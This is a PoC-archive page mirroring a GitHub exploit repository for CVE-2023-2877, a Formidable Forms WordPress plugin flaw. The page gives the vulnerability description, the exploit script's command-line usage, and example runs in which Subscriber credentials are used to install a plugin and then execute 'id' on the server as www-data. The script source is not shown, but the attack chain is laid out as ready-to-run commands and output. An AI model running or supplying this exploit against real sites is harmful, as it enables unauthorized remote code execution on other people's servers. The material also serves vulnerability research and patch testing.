Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-2877 PoC — Formidable Forms < 6.3.1 - Subscriber+ Remote Code Execution

Source
https://github.com/RandomRobbieBF/CVE-2023-2877
Associated Vulnerability
Title:Formidable Forms < 6.3.1 - Subscriber+ Remote Code Execution (CVE-2023-2877)
Description:The Formidable Forms WordPress plugin before 6.3.1 does not adequately authorize the user or validate the plugin URL in its functionality for installing add-ons. This allows a user with a role as low as Subscriber to install and activate arbitrary plugins of arbitrary versions from the WordPress.org plugin repository onto the site, leading to Remote Code Execution.
Description
Formidable Forms < 6.3.1 - Subscriber+ Remote Code Execution
Readme
# CVE-2023-2877
Formidable Forms &lt; 6.3.1 - Subscriber+ Remote Code Execution


Usage
---

```
usage: CVE-2023-2877.py [-h] -w URL -u USERNAME -p PASSWORD [-pl PLUGIN] [-c CMD]

CVE-2023-2877 - Formidable Forms < 6.3.1 - Subscriber+ Remote Code Execution Script

options:
  -h, --help            show this help message and exit
  -w URL, --url URL     WordPress site URL
  -u USERNAME, --username USERNAME
                        WordPress username
  -p PASSWORD, --password PASSWORD
                        WordPress password
  -pl PLUGIN, --plugin PLUGIN
                        Different Plugin to Install i.e mstore-api.3.9.0.zip
  -c CMD, --cmd CMD     Command value
```

Example
---

```
$ python3 CVE-2023-2877.py -w http://wordpress.lan -u user -p useruser1
Successfully logged in.
Token extracted: 15157e0f4740e9d1bbccdc5edbef1292943daf7d064637de094b2af2e9364ee9262f985d41d1658d90f1387800d09e8269a93f6397333e61c13240ababb4648d
Plugin installed successfully.
Now run exploit script with --cmd / -c and command.
```

```
$ python3 CVE-2023-2877.py -w http://wordpress.lan -u user -p useruser1 -c id
Data:
[['uid=33(www-data) gid=33(www-data) groups=33(www-data)']]
```

Warning
---
YOU NEED TO UNINSTALL THE VULNERABLE PLUGIN User Post Gallery as it's got not authentication!
File Snapshot

 [4.0K]  /data/pocs/2da601fef7226c28e8a1d4df97a25360db9e1614
├── [4.3K]  CVE-2023-2877.py
├── [ 11K]  LICENSE
├── [1.3K]  README.md
└── [   9]  requirements.txt

0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →